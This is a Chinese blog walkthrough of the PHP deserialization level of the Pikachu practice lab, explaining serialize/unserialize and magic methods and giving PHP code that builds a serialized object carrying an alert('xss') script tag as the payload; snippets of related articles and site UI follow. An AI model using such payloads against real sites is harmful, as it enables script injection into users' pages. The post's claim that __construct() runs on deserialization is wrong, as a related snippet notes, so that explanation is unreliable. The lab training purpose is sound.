Pikachu 序列化与反序列化

最新推荐文章于 2023-11-21 22:19:53 发布
最新推荐文章于 2023-11-21 22:19:53 发布
阅读量211 收藏
点赞数
文章标签: 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63152656/article/details/127041236
版权

php中序列化serialize(),        反序列化unserialize()

序列化:serialize()

        是把一个对象变成可以传输的字符串

反序列化 unserialize()

        就是把序列化的字符串还原成为对象,然后再接下来的代码中继续使用

常见的几个魔法函数:(注意被调用就是执行!!)

        __construct()当一个对象创建时被调用

        __destruct()当一个对象销毁时被调用

        __toString()当一个对象被当作一个字符串使用

        _sleep() 在对象在被序列化之前运行

        __wakeup将在序列化之后立即被调用

这里直接说明:在pikachu中是使用了__construct()函数,所以在创建对象时,就会调用执行小黑用户上传的恶意代码

 好了,现在小黑只需要做出一个序列化的代码即可上传了!

<?php

class S{

	var $test = "<script>alert('xss')</script>";

}

echo '<br>';
$a = new S();
echo serialize($a);

?>

上面代码找个文本文档改个后缀。用网页打开

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

 这样你就得到一个payload,去试试吧!

ok!over!

hts0336
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu反序列化
莫黎小天
06-29 533
1 .序列化 对象转换成字符串 持久保存 网络传输 例如: class S{ public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;} O:代表object 1:代表对象名字长度为一个字符 S:对象的
PHP反序列化概述
k0sec的安全路
02-27 506
PHP反序列化概述: 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 ...
pikachu-反序列化
-----------------------------------------------------------------------------------------
10-25 221
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:class S{snewS;创建一个对象serializes=new S();//创建一个对象serialize(snewS;//创建一个对象serializes);//把这个对象进行序列化
pikachu 反序列化靶场
最新发布
weixin_51559599的博客
11-21 215
核心代码$unser->test接收上传的参数判断是否能够被反序列化,即上传的参数是否经过序列化如果上传的序列化后的参数,将上传的数据反序列化后,自动执行魔术方法用来输出反序列化后对象的test属性的值到页面上。
pikachu序列化反序列化
Cwillchris的博客
11-01 201
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 看一下页面,接受反序列化,打开源码文件看看它反序列化什么 也就是把我们传进去的东西进行序列化 那这个输入框要输入序列化数据 访问菜鸟工具PHP 在线工具 | 菜鸟工具 构造如下代码并转化为序列化数据 <?php class S{ var $test = "<script>alert(1)<
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3635
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
pikachu.rar
03-05
用于搭建本地测试环境,是一个比较详细的漏洞平台,可用于搭建靶场、进行SQL注入测试,运用于Web安全攻防。
反序列化——pikachu
qq_43660551的博客
05-17 619
序列化:为了方便传输和存储数据,将要传输或者存储的对象进行序列化生成json对象,传到持久化服务器上。 反序列化:从内存中读取序列化后的json对象,将其转换为所需对象。 PHP序列化函数:serialize() 反序列化函数:unserialize() 看下源码:这里使用POST方式接收数据,并使用unserialize()函数对接收到的数据进行反序列化。 <?php /** * Created by runner.han * There is nothing new under t
pikachu之php反序列化()
weixin_54431413的博客
04-15 3038
pikachu靶场的反序列化漏洞 (代码审计能力有点弱鸡,不对之处请指教)
序列化接口 Serializable 和 Parcelable
binaryshao
01-17 447
Serializable 反射? serialVersionUID 确保反序列化成功的关键 ANY-ACCESS-MODIFIER static final long serialVersionUID = 42L; * It is also strongly advised that explicit * serialVersionUID declarations use the &amp;amp;amp;lt;...
php反序列化原理和案例演示
北冥有鱼
05-29 646
概述 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到...
Pikachu漏洞平台练习——PHP序列化反序列化、PHP反序列化漏洞
7Riven's blog
11-13 1004
1.序列化serialize()与反序列化unserialize() 序列化:把一个对象变成可以传输的字符串。 反序列化:把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。 举例说明如下: <?php Class a{ Var $test = 'test'; } $a = new a(); Echo serialize($a);//序列化成为一个字符串形式 $b=uns...
渗透测试之pikachu PHP反序列化(未完成)
LKmnbZ's Blog
11-14 474
1. 概述 序列化反序列化 序列化函数serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子...
pikachu-php反序列化源码分析及修复
静水流深,沧笙踏歌
09-08 1381
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。             序列化serialize()            ...
pikachu-PHP反序列化
baidu_39504221的博客
11-23 503
PHP对象需要表达的内容较多,如类属性值的类型、值等,所以会存在一个基本格式。下面则是PHP序列化后的基本类型表达: 布尔型(bool):b:value=>b:0 整数型(int):i:value=>i:1 整数型(int):i:value=>i:1 字符串型(str):s:length:“value”;=>s:4:“aaaa” 数组型(array):a:<length>:{key,value pairs};=>a:1:{i:1;s:1:“a”} 对象型(obje
pikachu反序列化
09-07
反序列化Pikachu对象,你需要使用适当的反序列化方法,通常是根据你使用的编程语言和框架来决定。以下是一个示例,在Python中使用pickle模块进行反序列化的代码: ```python import pickle # 反序列化Pikachu对象 with open('pikachu.pickle', 'rb') as file: pikachu = pickle.load(file) # 现在你可以使用反序列化后的Pikachu对象进行操作 pikachu.speak() ``` 请注意,这只是一个示例,你需要将'pikachu.pickle'替换为你实际存储Pikachu对象的文件名。另外,确保你在反序列化之前已经将Pikachu对象序列化并存储到文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值